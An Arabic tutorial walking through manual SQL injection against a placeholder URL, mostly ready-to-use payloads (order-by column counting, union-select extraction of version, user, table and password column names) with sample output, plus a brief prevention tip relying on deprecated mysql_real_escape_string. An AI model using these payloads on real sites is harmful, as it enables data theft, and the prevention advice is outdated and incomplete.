للقيام بحقن قواعد البيانات بشكل يدوى اولا يتتطلب منك معرفة اعداد الاعمدة داخل قا

1. للقيام بحقن قواعد البيانات بشكل يدوى اولا يتتطلب منك معرفة اعداد الاعمدة داخل قاعدة البيانات عن طريق المثال الاتى: http://example.com/index.php?id=1
2.  
3. مثال لحقن القاعدة الان :
4.  
5. id=1'
6.  
7. او
8.  
9. id=1 <مسافة بعد رقم واحد>
10.  
11. او
12.  
13. id=1\
14.  
15. اذا كانت القاعدة مصابة بثغرة حقن قواعد البيانات فسيظهر لك الرسالة التالية
16.  
17. مثال:
18.  
19. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and LanguageID=0' at line 1
20.  
21. بعد ذلك نبدا فى معرفة عدد الاعمدة داخل قاعدة البيانات مثلا :
22.  
23. http://example.com/index.php?id=1' order by 20 #
24.  
25. مثلا سوف يظهر لك كالتالى خطا اخر فيه :
26.  
27. Unknown column '20' in 'order clause'
28.  
29. ده معناه لا يوجد عمود رقم 20
30.  
31. ندخل مثلا http://example.com/index.php?id=1' order by 19 #
32.  
33. نبدا فى ادخال ارقام اقل من 20 مثلا 19 اذا ظهر نفس الخطا
34.  
35. Unknown column '19' in 'order clause'
36.  
37. نحاول مرة اخرى مع 18 او 17 او 16 او 15 الى ان يختفى الخطا تماما وتظهر لنا الصفحة بشكل عادى ولا يوجد بها اى خطأ عندها نعلم كم عدد الاعمدة داخل هذه القاعدة وليكن العدد 7 سوف يصبح كالتالى :
38.  
39. http://example.com/index.php?id=-1' union select 1,2,3,4,5,6,7 #
40.  
41. لاحظ هنا غيرنا العدد الى سالب او عدد كبير مثلا 343435345435 وبعد ذلك استخدمنا دالة union select لكى نشير على سبيل المثال :
42.  
43. http://example.com/index.php?id=-1' union select 1,version(),3,4,5,6,7 #
44.  
45. version of database = version() فيرجن قاعدة البيانات
46.  
47. مثلا : version as 5.0.1 or 4.3
48.  
49. ممكن ان تبدل version() ب database() او user()
50.  
51. مثال اسم الداتا بيز db_test
52.  
53. مثال اسم اليوزر localhost@adminuser_test
54.  
55. المرحلة الثالثة نبدا فى معرفة اسم الجدول table_name
56.  
57. على سبيل المثال :
58. http://example.com/index.php?id=-1' union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database() #
59.  
60. سوف يظهر مثلا كالتالى:
61.  
62. administrator,category,product,users هؤلاء هم اسماء الجداول داخل قاعدة البيانات
63.  
64. بعد ذلك نريد ان نظهر اسماء الاعمدة عن طريق :
65.  
66. http://example.com/index.php?id=-1' union select 1,2,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() #
67.  
68. سوف يظهر لك على سبيل المثال كالتالى :
69.  
70. email_id,password,admin_id,user_name,password,user_type
71.  
72. لاحظ هذه المعلومات الخطيرة التى ظهرت لك انت ممكن عن طريق تنفيذ اوامر ايضا فى قاعدة البيانات ان تعرضها وتكون معرضة للسرقة
73.  
74. ملحوظة توجد اداة تضاف الى الفايرفوكس تسمى Hackbar
75.  
76. https://addons.mozilla.org/en-US/firefox/addon/hackbar/
77.  
78. كيفية منع حقن البيانات توجد وظيفة موجودة فى ال mysql
79. : على سبيل المثال تسمى
80. mysql_real_escape_string
81.  
82. طريقة استخدامها على سبيل المثال:
83.  
84. $query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'",
85. mysql_real_escape_string($user),
86. mysql_real_escape_string($password));
87.  
88. انصحك بمتابعة هذه السلسلة من الفيديوهات على الانترنت ابحث عنها ستجدها
89.  
90. hitesh choudharymaster sql injection